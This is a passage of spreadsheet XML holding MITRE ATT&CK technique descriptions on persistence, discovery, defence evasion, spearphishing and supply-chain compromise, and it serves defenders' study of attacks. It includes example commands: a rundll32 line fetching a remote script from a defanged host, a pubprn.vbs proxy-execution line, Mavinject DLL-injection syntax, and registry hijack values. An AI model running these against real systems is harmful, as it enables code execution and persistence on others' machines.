        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows Admin Shares</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Remote Desktop Protocol</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>T1021</t>
  </si>
  <si>
    <t>An adversary may use Valid Accounts to log into a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.</t>
  </si>
  <si>
    <t>T1018</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</si>
  <si>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</si>
  <si>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Examples of tools and commands that acquire this information include "ping" or "net view" using Net.</t>
  </si>
  <si>
    <r>
      <t>Specific to Mac, the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>bonjour</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> protocol to discover additional Mac-based systems within the same broadcast domain. Utilities such as "ping" and others can be used to gather information about remote systems.</t>
    </r>
  </si>
  <si>
    <t>Utilities such as "ping" and others can be used to gather information about remote systems.</t>
  </si>
  <si>
    <t>T1091</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</si>
  <si>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</si>
  <si>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T1014</t>
  </si>
  <si>
    <r>
      <t>Rootkits are programs that hide the existence of malware by intercepting (i.e., </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Hooking</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>) and modifying operating system API calls that supply system information.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>156</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Hypervisor</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, Master Boot Record, or the </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>System Firmware</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>289</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>290291</t>
    </r>
  </si>
  <si>
    <t>T1085</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</si>
  <si>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t>
  </si>
  <si>
    <t>Rundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute.292</t>
  </si>
  <si>
    <t>Rundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:https[:]//www[.]example[.]com/malicious.sct")" This behavior has been seen used by malware such as Poweliks.293</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <r>
      <t>The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>294</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> An account can hold additional SIDs in the SID-History Active Directory attribute</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>295</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens). Adversaries may use this mechanism for privilege escalation. With Domain Administrator (or equivalent) rights, harvested or well-known SID values</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>296</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Remote Services</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows Admin Shares</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, or </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Windows Remote Management</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <r>
      <t>In user mode, Windows Authenticode</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>297</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>298</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>299</t>
    </r>
  </si>
  <si>
    <r>
      <t>Because of the varying executable file types and corresponding signature formats, Microsoft created software components called Subject Interface Packages (SIPs)</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>300</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>301</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>) and are identified by globally unique identifiers (GUIDs).</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>299</t>
    </r>
  </si>
  <si>
    <r>
      <t>Similar to </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Code Signing</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, adversaries may abuse this architecture to subvert trust controls and bypass security policies that allow only legitimately signed code to execute on a system. Adversaries may hijack SIP and trust provider components to mislead operating system and whitelisting tools to classify malicious (or any) code as signed by:</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>299</t>
    </r>
  </si>
  <si>
    <t>Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE[\WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllGetSignedDataMsg\{SIP_GUID}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all files using that SIP302 (although a hash mismatch will likely occur, invalidating the signature, since the hash returned by the function will not match the value computed from the file).</t>
  </si>
  <si>
    <t>Modifying the Dll and FuncName Registry values in HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\OID\EncodingType 0\CryptSIPDllVerifyIndirectData\{SIP_GUID}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SIP302 (with or without hijacking the previously mentioned CryptSIPDllGetSignedDataMsg function). This Registry value could also be redirected to a suitable exported function from an already present DLL, avoiding the requirement to drop and execute a new file on disk.</t>
  </si>
  <si>
    <r>
      <t>Modifying the </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>DLL</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>Function</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Registry values in </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\SOFTWARE\[WOW6432Node\]Microsoft\Cryptography\Providers\Trust\FinalPolicy\{trust provider GUID}</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <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t>
    </r>
  </si>
  <si>
    <t>Note: The above hijacks are also possible without modifying the Registry via DLL Search Order Hijacking.</t>
  </si>
  <si>
    <t>Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation.299</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <r>
      <t>Utilities such as </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>at</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>schtasks</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>,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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>303</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> as part of </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Lateral Movement</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, to gain SYSTEM privileges, or to run a process under the context of a specified account.</t>
    </r>
  </si>
  <si>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</si>
  <si>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</si>
  <si>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T1113</t>
  </si>
  <si>
    <t>Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations.</t>
  </si>
  <si>
    <r>
      <t>On OSX, the native command </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>screencapture</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> is used to capture screenshots.</t>
    </r>
  </si>
  <si>
    <t>On Linux, there is the native command xwd.149</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.304 The Windows screensaver application scrnsave.exe is located in C:\Windows\System32\ along with screensavers included with base Windows installations. The following screensaver settings are stored in the Registry (HKCU\Control Panel\Desktop\) and could be manipulated to achieve persistence:</t>
  </si>
  <si>
    <r>
      <t>SCRNSAVE.exe</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> - set to malicious PE path</t>
    </r>
  </si>
  <si>
    <r>
      <t>ScreenSaveActive</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> - set to '1' to enable the screensaver</t>
    </r>
  </si>
  <si>
    <r>
      <t>ScreenSaverIsSecure</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> - set to '0' to not require a password to unlock</t>
    </r>
  </si>
  <si>
    <r>
      <t>ScreenSaverTimeout</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> - sets user inactivity timeout before screensaver is executed</t>
    </r>
  </si>
  <si>
    <t>Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity.305</t>
  </si>
  <si>
    <t>T1064</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</si>
  <si>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</si>
  <si>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r>
      <t>Scripts can be embedded inside Office documents as macros that can be set to execute when files used in </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Spearphishing Attachment</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and other types of spearphishing are opened. Malicious embedded macros are an alternative means of execution than software exploitation through </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Exploitation for Client Execution</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, where adversaries will rely on macos being allowed or that the user will accept to activate them.</t>
    </r>
  </si>
  <si>
    <r>
      <t>Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>306</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, Veil</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>307</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and PowerSploit</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>253</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>308</t>
    </r>
  </si>
  <si>
    <t>T1063</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</si>
  <si>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</si>
  <si>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r>
      <t>Example commands that can be used to obtain security software information are </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>netsh</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>reg query</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Reg</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>dir</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>cmd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Tasklist</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.</t>
    </r>
  </si>
  <si>
    <t>It's becoming more common to see macOS malware perform checks for LittleSnitch and KnockKnock software.</t>
  </si>
  <si>
    <t>T1101</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</si>
  <si>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309</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <r>
      <t>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>New Service</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> and </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Modify Existing Service</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> during service persistence or privilege escalation.</t>
    </r>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <r>
      <t>Windows stores local service configuration information in the Registry under </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>HKLM\SYSTEM\CurrentControlSet\Services</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe, PowerShell, or </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Reg</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>. Access to Registry keys is controlled through Access Control Lists and permissions.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>310</t>
    </r>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Adversaries may also alter Registry keys associated with service failure parameters (such as FailureCommand) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.198</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1218</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</si>
  <si>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</si>
  <si>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Mavinject.exe</t>
  </si>
  <si>
    <t>Mavinject.exe is a Windows utility that allows for code execution. Mavinject can be used to input a DLL into a running process.311</t>
  </si>
  <si>
    <t>"C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt; C:\Windows\system32\mavinject.exe &lt;PID&gt; /INJECTRUNNING &lt;PATH DLL&gt;</t>
  </si>
  <si>
    <t>SyncAppvPublishingServer.exe</t>
  </si>
  <si>
    <t>SyncAppvPublishingServer.exe can be used to run powershell scripts without executing powershell.exe.312</t>
  </si>
  <si>
    <t>Several others binaries exist that may be used to perform similar behavior.46</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>Scripts signed with trusted certificates can be used to proxy execution of malicious files. This behavior may bypass signature validation restrictions and application whitelisting solutions that do not account for use of these scripts.</t>
  </si>
  <si>
    <t>PubPrn.vbs is signed by Microsoft and can be used to proxy execution from a remote site.313 Example command: cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs 127.0.0.1 script:http[:]//192.168.1.100/hi.png</t>
  </si>
  <si>
    <t>There are several other signed scripts that may be used in a similar manner.46</t>
  </si>
  <si>
    <t>T1045</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</si>
  <si>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available,314 but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.</t>
  </si>
  <si>
    <t>T1193</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</si>
  <si>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</si>
  <si>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T1192</t>
  </si>
  <si>
    <t>Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attachment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t>
  </si>
  <si>
    <t>T1194</t>
  </si>
  <si>
    <t>Spearphishing via service is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of third party services rather than directly via enterprise email channels.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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T1095</t>
  </si>
  <si>
    <r>
      <t>Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>315</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>316</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> however, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.</t>
    </r>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>Supply chain compromise is the manipulation of products or product delivery mechanisms prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise can take place at any stage of the supply chain including:</t>
  </si>
  <si>
    <t>Manipulation of development tools</t>
  </si>
  <si>
    <t>Manipulation of a development environment</t>
  </si>
  <si>
    <t>Manipulation of source code repositories (public or private)</t>
  </si>
  <si>
    <t>Manipulation of software update/distribution mechanisms</t>
  </si>
  <si>
    <t>Compromised/infected system images (multiple cases of removable media infected at the factory)</t>
  </si>
  <si>
    <t>Replacement of legitimate software with modified versions</t>
  </si>
  <si>
    <t>Sales of modified/counterfeit products to legitimate distributors</t>
  </si>
  <si>
    <t>Shipment interdiction</t>
  </si>
  <si>
    <r>
      <t>While supply chain compromise can impact any component of hardware or software, attackers looking to gain execution have often focused on malicious additions to legitimate software in software distribution or update channels.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>317318319</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> Targeting may be specific to a desired victim set</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>320</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t> or malicious software may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>317319</t>
    </r>
  </si>
  <si>
    <t>T1019</t>
  </si>
  <si>
    <r>
      <t>The BIOS (Basic Input/Output System) and The Unified Extensible Firmware Interface (UEFI) or Extensible Firmware Interface (EFI) are examples of system firmware that operate as the software interface between the operating system and hardware of a computer.</t>
    </r>
    <r>
      <rPr>
        <sz val="7.5"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>321322323</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>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r>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.</t>
  </si>
  <si>
    <r>
      <t>Example commands and utilities that obtain this information include </t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color rgb="FF000000"/>
        <rFont val="Courier New"/>
        <family val="3"/>
      </rPr>
      <t>ver</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF000000"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>, </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FF0B0080"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>Systeminfo</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
